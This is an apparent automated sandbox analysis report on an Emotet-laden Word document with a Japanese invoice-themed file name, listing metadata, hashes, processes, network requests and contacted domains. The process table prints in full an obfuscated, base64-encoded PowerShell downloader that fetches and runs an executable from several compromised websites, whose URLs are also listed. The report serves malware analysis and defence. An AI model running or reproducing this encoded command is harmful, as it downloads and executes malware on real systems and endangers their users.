File name: | 1614_202008 ご入金額の通知・ご請求書発行のお願い.doc |
Full analysis: | https://app.any.run/tasks/90c95aab-9e4d-4b78-b911-432d77c5cecc |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 30, 2020, 09:16:31 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Molestiae., Author: Alicia Blanchard, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Aug 27 23:37:00 2020, Last Saved Time/Date: Thu Aug 27 23:37:00 2020, Number of Pages: 1, Number of Words: 5, Number of Characters: 29, Security: 0 |
MD5: | CA15F9F45971EA442943084547761994 |
SHA1: | F4134B9DF06C604BEF7619DB66500DF2684AE000 |
SHA256: | A02A8AD984B702BCF392E49FC099D28BB09A1FB57ACC50FE3F090678F3FEF082 |
SSDEEP: | 3072:C6Yy0u8YGgjv+ZvchmkHcI/o1/Vb6//////////////////////////////////Y:CC0uXnWFchmmcI/o1/+Qswayp |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
LocaleIndicator: | 1033 |
CodePage: | Unicode UTF-16, little endian |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 15 |
CharCountWithSpaces: | 33 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
Security: | None |
Characters: | 29 |
Words: | 5 |
Pages: | 1 |
ModifyDate: | 2020:08:27 22:37:00 |
CreateDate: | 2020:08:27 22:37:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Alicia Blanchard |
Subject: | - |
Title: | Molestiae. |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2240 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\1614_202008 ご入金額の通知・ご請求書発行のお願い.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1904 | powersheLL -e JABFAHgAcwB4AGEAMgA5AD0AKAAoACcAUwBrAF8AbwAnACsAJwBfADMAJwApACsAJwByACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdABFAE0AcABcAFcAbwByAGQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQAaQByAEUAYwBUAE8AUgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwB1AHIAaQB0AGAAeQBwAHIAYABPAHQAYABvAEMATwBMACIAIAA9ACAAKAAnAHQAJwArACgAJwBsAHMAJwArACcAMQAnACkAKwAnADIALAAnACsAKAAnACAAdABsAHMAJwArACcAMQAxACwAJwApACsAKAAnACAAJwArACcAdABsAHMAJwApACkAOwAkAFEAMABrADkAdABtAG0AIAA9ACAAKAAnAFcAdwAnACsAJwAxAHUAJwArACgAJwBjACcAKwAnAHoAcwB3ACcAKQApADsAJABUAHkAZgBnAGMAaABkAD0AKAAoACcATQAnACsAJwBrAGYAJwApACsAKAAnAHQAMQBkACcAKwAnADUAJwApACkAOwAkAE8ANwBzAHAAdQAxAG4APQAkAGUAbgB2ADoAdABlAG0AcAArACgAKAAoACcANwBZACcAKwAnAHQAdwAnACkAKwAoACcAbwByACcAKwAnAGQANwBZACcAKQArACgAJwB0ACcAKwAnADIAMAAnACkAKwAnADEAOQAnACsAKAAnADcAWQAnACsAJwB0ACcAKQApAC0AQwBSAEUAcABMAEEAQwBFACAAIAAoACcANwAnACsAJwBZAHQAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKwAkAFEAMABrADkAdABtAG0AKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFMAMQBqADEAMAB2ADYAPQAoACcAVABkACcAKwAoACcAOAB3ACcAKwAnADQAcAByACcAKQApADsAJABPAGcAMQBrAHEAdgBlAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlACcAKwAnAGMAdAAnACkAIABuAGUAVAAuAFcAZQBiAGMATABpAGUATgB0ADsAJABJADEAbQBrAGQAcgBfAD0AKAAnAGgAdAAnACsAKAAnAHQAcAAnACsAJwA6ACcAKQArACcALwAnACsAJwAvACcAKwAoACcAcgAnACsAJwBpAGMAawAnACsAJwB0AGgAJwApACsAJwBlACcAKwAoACcAdwBlACcAKwAnAGwAJwApACsAKAAnAGQAZQAnACsAJwByAC4AYwAnACsAJwBvAG0ALwAnACkAKwAnAGQAJwArACcAdAAnACsAJwBiACcAKwAnAGsAdQAnACsAJwBwADIAJwArACgAJwAwADEAMQAwACcAKwAnADIAJwArACcAMAAnACkAKwAoACcANQAnACsAJwAvAGkAJwApACsAJwAvACoAJwArACcAaAAnACsAJwB0ACcAKwAnAHQAJwArACgAJwBwACcAKwAnADoALwAnACkAKwAoACcALwBzAGkAdAAnACsAJwBlACcAKQArACgAJwBjAGcAJwArACcAcABzACcAKQArACgAJwAuACcAKwAnAGMAbwAnACkAKwAoACcAbQAvAGMAJwArACcAZwBpAC0AYgAnACsAJwBpAG4AJwApACsAKAAnAC8ANwAvACcAKwAnACoAJwApACsAJwBoAHQAJwArACgAJwB0AHAAJwArACcAOgAvAC8AJwArACcAdABmACcAKQArACgAJwBiAGEAdQByAHUALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALgAnACkAKwAoACcAYgAnACsAJwByAC8AYwAnACkAKwAoACcAZwAnACsAJwBpACcAKwAnAC0AYgBpACcAKwAnAG4ALwBMAGgAZQAnACkAKwAoACcALwAqACcAKwAnAGgAdAAnACkAKwAnAHQAcAAnACsAJwBzADoAJwArACgAJwAvAC8AcAAnACsAJwBhAHUAbABiAHUAcgAnACkAKwAoACcAawBwAGgAbwAnACsAJwB0ACcAKQArACgAJwBvAGcAJwArACcAcgBhACcAKQArACgAJwBwACcAKwAnAGgAeQAuAGMAJwApACsAJwBvACcAKwAoACcAbQAvAF8AJwArACcAbgBlAHcAJwApACsAKAAnAF8AJwArACcAaQBtAGEAJwApACsAJwBnAGUAJwArACcAcwAnACsAJwAvACcAKwAoACcARgAvACoAJwArACcAaAB0AHQAJwArACcAcAA6AC8ALwB0AGgAZQBlACcAKwAnAGwAJwArACcAZAAnACkAKwAnAGUAJwArACcAcwAnACsAKAAnAHQAZwBlAGUAawAnACsAJwAuAGMAJwApACsAKAAnAG8AbQAnACsAJwAvAGUAcgByAG8AJwApACsAJwByACcAKwAnAC8AJwArACgAJwBGAFMALwAnACsAJwAqAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAJwA6ACcAKwAnAC8ALwAnACsAJwB1ACcAKwAoACcAbgBpAHEAJwArACcAdQBlACcAKQArACgAJwB3AHYALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACkAKwAnAGMAJwArACgAJwBnAGkALQBiAGkAJwArACcAbgAnACsAJwAvAE8AVgBKACcAKQArACgAJwA5ACcAKwAnAHEAWQAvACcAKwAnACoAaAB0AHQAcAAnACkAKwAoACcAOgAvAC8AdAB1ACcAKwAnAGwAcwAuACcAKwAnAHAAbAAvAGMAZwAnACsAJwBpAC0AJwArACcAYgBpAG4AJwApACsAJwAvADcAJwArACgAJwBhACcAKwAnADkALwAnACkAKQAuACIAUwBwAGwAYABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABYAGoAaQBjADMAeAB4AD0AKAAnAFgAJwArACgAJwBhAHMAJwArACcAcgAnACkAKwAoACcAbQAnACsAJwBhAGUAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABMADIAOQByADQAYQBtACAAaQBuACAAJABJADEAbQBrAGQAcgBfACkAewB0AHIAeQB7ACQATwBnADEAawBxAHYAZQAuACIARABvAHcAbgBgAEwATwBgAEEARABGAGAAaQBsAEUAIgAoACQATAAyADkAcgA0AGEAbQAsACAAJABPADcAcwBwAHUAMQBuACkAOwAkAFgAdwBtADAAaQA3AHAAPQAoACgAJwBWAHkAJwArACcAbwAnACkAKwAoACcAXwAnACsAJwBsAHIAdwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABPADcAcwBwAHUAMQBuACkALgAiAGwAZQBOAGcAYABUAEgAIgAgAC0AZwBlACAAMgAxADAAMgA3ACkAIAB7ACYAKAAnAEkAbgAnACsAJwB2AG8AawBlAC0AJwArACcASQB0AGUAbQAnACkAKAAkAE8ANwBzAHAAdQAxAG4AKQA7ACQAQQB4AHIANgAyAGcAZAA9ACgAKAAnAEUANQA5AGMAJwArACcAbgAnACkAKwAnAGUAMwAnACkAOwBiAHIAZQBhAGsAOwAkAEoAMQBoAGMAcwA4AGEAPQAoACgAJwBCAGoAJwArACcAZAAnACkAKwAnAGkAeQAnACsAJwAzAHAAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABNAHkAbQBvAHkAegBmAD0AKAAoACcARwA3AGIAJwArACcAYwAnACkAKwAoACcAcgAnACsAJwBkAHIAJwApACkA | C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2240 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA78B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2240 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFB615778F1FFDACAF.TMP | — | |
MD5:— | SHA256:— | |||
1904 | powersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NYAKCAZU77PY6NUFXDS4.temp | — | |
MD5:— | SHA256:— | |||
2240 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$14_202008 ご入金額の通知・ご請求書発行のお願い.doc | pgc | |
MD5:F47CB4852805CE4EF0D0C7CA9D876A27 | SHA256:4D0496909BFEC7E73F9960D76EC2E53DA77F2581EA5DA58B5E058B08BC0BD579 | |||
2240 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:DB7ED30F2AF244B37602E9A8FA40BC69 | SHA256:6C261EB204362985E24872BAC097DA758424FC98F9EA7C6D717C17385EC5961A | |||
2240 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:A2DB20460CB9A7257C2F56D05BF0A421 | SHA256:385FF7270BC9432F66B7AC295968B9B5805A067D3F47E76B1C2EA71ADEED2D16 | |||
1904 | powersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bb4d9.TMP | binary | |
MD5:4028388263805ABA00088A0BA4EEA515 | SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948 | |||
1904 | powersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:4028388263805ABA00088A0BA4EEA515 | SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1904 | powersheLL.exe | GET | 403 | 74.96.241.34:80 | http://theeldestgeek.com/error/FS/ | US | html | 743 b | suspicious |
1904 | powersheLL.exe | GET | 301 | 185.221.108.96:80 | http://tuls.pl/cgi-bin/7a9/ | unknown | html | 234 b | unknown |
1904 | powersheLL.exe | GET | 404 | 108.60.15.59:80 | http://rickthewelder.com/dtbkup20110205/i/ | CA | html | 124 b | suspicious |
1904 | powersheLL.exe | GET | 404 | 185.221.108.96:80 | http://tuls.pl/cgi-bin/7a9 | unknown | html | 1.52 Kb | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1904 | powersheLL.exe | 64.90.34.152:443 | paulburkphotography.com | New Dream Network, LLC | US | unknown |
1904 | powersheLL.exe | 174.136.37.108:80 | sitecgps.com | Colo4, LLC | US | unknown |
1904 | powersheLL.exe | 162.241.88.184:80 | tfbauru.com.br | CyrusOne LLC | US | suspicious |
1904 | powersheLL.exe | 74.96.241.34:80 | theeldestgeek.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | suspicious |
1904 | powersheLL.exe | 185.221.108.96:80 | tuls.pl | — | — | unknown |
1904 | powersheLL.exe | 158.106.138.177:80 | uniquewv.com | — | US | unknown |
1904 | powersheLL.exe | 108.60.15.59:80 | rickthewelder.com | In2net Network Inc. | CA | suspicious |
Domain | IP | Reputation |
---|---|---|
rickthewelder.com |
| suspicious |
sitecgps.com |
| suspicious |
tfbauru.com.br |
| suspicious |
paulburkphotography.com |
| unknown |
theeldestgeek.com |
| suspicious |
uniquewv.com |
| unknown |
dns.msftncsi.com |
| shared |
tuls.pl |
| unknown |